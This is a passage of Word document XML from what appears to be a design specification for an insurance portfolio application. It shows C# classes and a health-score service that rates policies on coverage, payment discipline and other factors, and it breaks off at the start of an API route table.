          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public int TotalScore { get; set; }           // 0–100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string Grade { get; set; } = "";       // A+, A, B, C, D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string GradeLabel { get; set; } = "";  // "Excellent", "Good", ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public List&lt;HealthScoreFactor&gt; Factors { get; set; } = new();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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public class HealthScoreFactor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string Name { get; set; } = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public int Score { get; set; }      // Actual points earned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public int MaxScore { get; set; }   // Maximum possible points</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string Status { get; set; } = ""; // "Good", "Warning", "Critical"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public string Recommendation { get; set; } = "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.2  New Service — PortfolioHealthScoreService.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public interface IPortfolioHealthScoreService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    Task&lt;HealthScoreResultDto&gt; CalculateAsync(string[] memberNames);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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public class PortfolioHealthScoreService : IPortfolioHealthScoreService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public async Task&lt;HealthScoreResultDto&gt; CalculateAsync(string[] memberNames)</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var policies = await GetActivePoliciesForMembers(memberNames);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var factors  = new List&lt;HealthScoreFactor&gt;();</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 Factor 1: Coverage adequacy (25 pts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Life cover should be ≥10x of annual premiums paid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var lifeCover  = policies.Where(p =&gt; p.PolicyType?.Name.Contains("Life") == true)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 .Sum(p =&gt; p.CoverageAmount ?? 0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var annualPrem = policies.Sum(p =&gt; p.PremiumAmount);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        int coverageScore = lifeCover &gt;= annualPrem * 10 ? 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                          : lifeCover &gt;= annualPrem * 5  ? 15 : 5;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        factors.Add(new HealthScoreFactor</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Name = "Coverage Adequacy",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Score = coverageScore, MaxScore = 25,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Status = coverageScore &gt;= 20 ? "Good" : "Warning",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Recommendation = coverageScore &lt; 20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ? "Consider increasing life cover to at least 10x annual premium outflow."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                : "Life cover is adequate.",</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 Factor 2: Payment discipline (20 pts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var overdueCount = policies.Count(p =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            p.NextInstallmentDate &lt; DateTime.UtcNow &amp;&amp; p.Status == "Active");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        int paymentScore = overdueCount == 0 ? 20 : Math.Max(0, 20 - overdueCount * 5);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        factors.Add(new HealthScoreFactor</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Name = "Payment Discipline", Score = paymentScore, MaxScore = 20,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Status = overdueCount == 0 ? "Good" : "Critical",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Recommendation = overdueCount &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ? $"{overdueCount} overdue installment(s) found. Pay immediately to avoid lapse."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                : "All payments are current.",</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 Factor 3: Diversification (15 pts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Factor 4: Nominee completeness (15 pts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Factor 5: Document completeness (10 pts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Factor 6: Renewal health — no policies expiring &lt;30 days (15 pts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // ... (same pattern as above)</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return new HealthScoreResultDto</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TotalScore = factors.Sum(f =&gt; f.Score),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Factors    = factors,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            Grade      = DetermineGrade(factors.Sum(f =&gt; f.Score)),</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.3  New API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1800"/>
        <w:gridCol w:w="3160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
